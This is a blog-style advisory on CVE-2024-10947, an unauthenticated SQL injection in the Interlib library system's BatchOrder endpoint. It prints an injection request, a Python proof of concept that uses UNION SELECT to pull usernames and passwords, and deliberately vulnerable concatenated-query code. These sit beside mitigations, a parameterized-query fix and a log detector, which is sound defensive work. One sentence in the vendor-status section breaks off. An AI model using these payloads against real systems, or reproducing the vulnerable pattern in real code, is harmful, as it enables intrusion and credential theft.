A critical vulnerability, tracked as CVE-2024-10947, was discovered in the Guangzhou Tuchuang Computer Software Development Interlib Library Cluster Automation Management System up to version 2.1. The flaw allows an unauthenticated remote attacker to perform SQL injection by manipulating the bookrecno argument of the BatchOrder endpoint. The issue remains unpatched, and the details, including exploit code, have been made public.

This post breaks down what the vulnerability is, how an attacker can exploit it, and gives clear explanations for sysadmins, developers, and security researchers tasked with protecting their systems.

Where’s the Problem?

The vulnerability exists in the /interlib/order/BatchOrder endpoint. Specifically, the file in question is:

/interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl

The attack happens when a user provides unexpected input in the bookrecno parameter. The software does not properly sanitize this parameter before using it in an SQL query.

A successful attack could, in some cases, let an attacker take over the entire application or even the underlying server.

In this instance, all an attacker needs is network access to the vulnerable application. No login or credentials are required.

Exploit Method

A simple HTTP GET request with malicious code in the bookrecno field will trigger the vulnerability:

Example Malicious Request

GET /interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl&bookrecno=1'%20OR%201=1-- HTTP/1.1
Host: targetlibrary.example.com

If the input isn’t properly handled, the backend SQL query can be manipulated. Here’s a visual breakdown:

Vulnerable Pseudo-code

# Hypothetical vulnerable code
bookrecno = request.GET.get('bookrecno')
query = "SELECT * FROM orders WHERE bookrecno = '" + bookrecno + "'"
cursor.execute(query)

If bookrecno is set to 1' OR 1=1--, the query becomes:

SELECT * FROM orders WHERE bookrecno = '1' OR 1=1--'

This returns all records from the orders table, bypassing any intended restrictions.

Here’s a simple PoC using the requests library:

import requests

url = 'http://targetlibrary.example.com/interlib/order/BatchOrder'
params = {
    'cmdACT': 'admin_order',
    'xsl': 'adminOrder_OrderList.xsl',
    'bookrecno': "' UNION SELECT 1,username,password FROM users-- "
}

response = requests.get(url, params=params)
print(response.text)

This PoC attempts to extract usernames and passwords from a hypothetical users table.

Potential impact: unauthorized admin access.

All exploitation can be done remotely without authentication.

Status & Vendor Response

The vendor, Guangzhou Tuchuang, was notified early about this vulnerability but did not respond. As of now:

1. Restrict Access to the Endpoint

If possible, restrict or temporarily disable access to

/interlib/order/BatchOrder

2. Apply Input Filtering

Add server-side validation for the bookrecno parameter to ensure it contains only expected data (e.g., numbers).
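The following is an added example, not code from the original post or from the vendor. It puts the page's hypothetical vulnerable lookup (string concatenation) beside a hardened version that does what step 2 asks: a digits-only whitelist check on bookrecno, followed by a parameterized query. The in-memory SQLite table, its columns and its rows are constructed stand-ins for the real orders table, whose schema is not known from the page; the payload is the page's own 1' OR 1=1--.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the orders table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE orders (id INTEGER PRIMARY KEY, bookrecno TEXT, title TEXT)"
    )
    conn.executemany(
        "INSERT INTO orders (bookrecno, title) VALUES (?, ?)",
        [("1", "Order A"), ("2", "Order B"), ("3", "Order C")],
    )
    return conn


def lookup_vulnerable(conn, bookrecno):
    """Mirrors the page's hypothetical vulnerable code: user input is glued
    straight into the SQL text, so a quote and a comment marker rewrite the
    WHERE clause instead of being compared as data."""
    query = "SELECT title FROM orders WHERE bookrecno = '" + bookrecno + "'"
    return sorted(row[0] for row in conn.execute(query))


# Whitelist: a record number is expected to be a short run of digits only.
BOOKRECNO_RE = re.compile(r"[0-9]{1,10}")


def validate_bookrecno(raw):
    """Reject anything that is not 1-10 digits; returns the validated string."""
    if not isinstance(raw, str) or not BOOKRECNO_RE.fullmatch(raw):
        raise ValueError("bookrecno must be 1-10 digits")
    return raw


def lookup_safe(conn, bookrecno):
    """Hardened lookup: validate first, then bind the value as a query
    parameter so the database driver never interprets it as SQL."""
    value = validate_bookrecno(bookrecno)
    rows = conn.execute("SELECT title FROM orders WHERE bookrecno = ?", (value,))
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    db = make_db()
    payload = "1' OR 1=1--"
    print("vulnerable lookup with payload:", lookup_vulnerable(db, payload))
    try:
        lookup_safe(db, payload)
    except ValueError as exc:
        print("hardened lookup rejected payload:", exc)
```

Running it shows the concatenated query returning every order for the payload, while the hardened path refuses the input before any SQL is built. The whitelist is a defence-in-depth layer; the parameter binding is what actually removes the injection, so keep both even if one seems redundant.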

3. Monitor for Unusual Access

Watch your logs for suspicious requests, especially with SQL meta-characters in URLs.
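A log check along the lines of step 3, added here as an example that is not part of the original post: it parses access-log lines in combined log format, URL-decodes each query string, and flags requests to the BatchOrder endpoint whose bookrecno is not purely numeric or whose parameters contain SQL meta-characters. The log lines, IP addresses (documentation ranges), timestamps and user agents are constructed for the example; the two malicious requests reuse the page's own payloads.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [07/Nov/2024:04:20:01 +0000] "GET /interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl&bookrecno=12345 HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Nov/2024:04:21:17 +0000] "GET /interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl&bookrecno=1'%20OR%201=1-- HTTP/1.1" 200 98211 "-" "python-requests/2.32"
198.51.100.7 - - [07/Nov/2024:04:22:40 +0000] "GET /interlib/index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Nov/2024:04:23:05 +0000] "GET /interlib/order/BatchOrder?cmdACT=admin_order&xsl=adminOrder_OrderList.xsl&bookrecno=%27%20UNION%20SELECT%201,username,password%20FROM%20users-- HTTP/1.1" 500 180 "-" "python-requests/2.32"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

VULN_PATH = "/interlib/order/BatchOrder"
DIGITS_RE = re.compile(r"[0-9]+")
# Quotes, comment markers, statement separators and SQL keywords followed by
# whitespace: none of these belong in a record-number parameter.
SQLI_RE = re.compile(r"'|--|/\*|;|\b(?:union|select|or|and)\b\s", re.IGNORECASE)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qs percent-decodes values, so %27 becomes a literal quote here.
    entry["params"] = {
        k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()
    }
    return entry


def suspicious_reasons(entry):
    """List why a parsed request looks like an injection attempt (empty if clean)."""
    reasons = []
    if entry["path"] != VULN_PATH:
        return reasons
    bookrecno = entry["params"].get("bookrecno")
    if bookrecno is not None and not DIGITS_RE.fullmatch(bookrecno):
        reasons.append("bookrecno not numeric: %r" % bookrecno)
    for name, value in entry["params"].items():
        if SQLI_RE.search(value):
            reasons.append("SQL meta-characters in %s" % name)
    return reasons


def scan_log(text):
    """Run the check over every line; returns one alert per suspicious request."""
    alerts = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = suspicious_reasons(entry)
        if reasons:
            alerts.append(
                {
                    "ip": entry["ip"],
                    "ts": entry["ts"],
                    "status": entry["status"],
                    "reasons": reasons,
                }
            )
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["status"], "; ".join(alert["reasons"]))
```

The numeric check on bookrecno is the high-confidence signal for this CVE; the generic meta-character match is noisier but catches variations in other parameters. Decoding before matching matters, since the payload in the page's request arrives as %20 and %27 sequences and a raw-string match on the URL would miss the quote.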

4. Update Regularly

If/when a patch is released, update immediately.

References

- NVD - CVE-2024-10947
- Vuldb Advisory
- Exploit by aszhc (GitHub)

Conclusion

The critical SQL injection vulnerability CVE-2024-10947 in the Interlib Library Cluster Automation Management System poses a serious risk to libraries and businesses using this software. Immediate action is required, as the exploit is public and there is no vendor fix.

If you run this system, take it seriously and defend your data before someone else gets in.

*This article is original content made simple for broad use. Please reference the advisories above for the most recent technical status.*

Timeline

Published on: 11/07/2024 04:15:03 UTC
Last modified on: 12/11/2024 19:58:55 UTC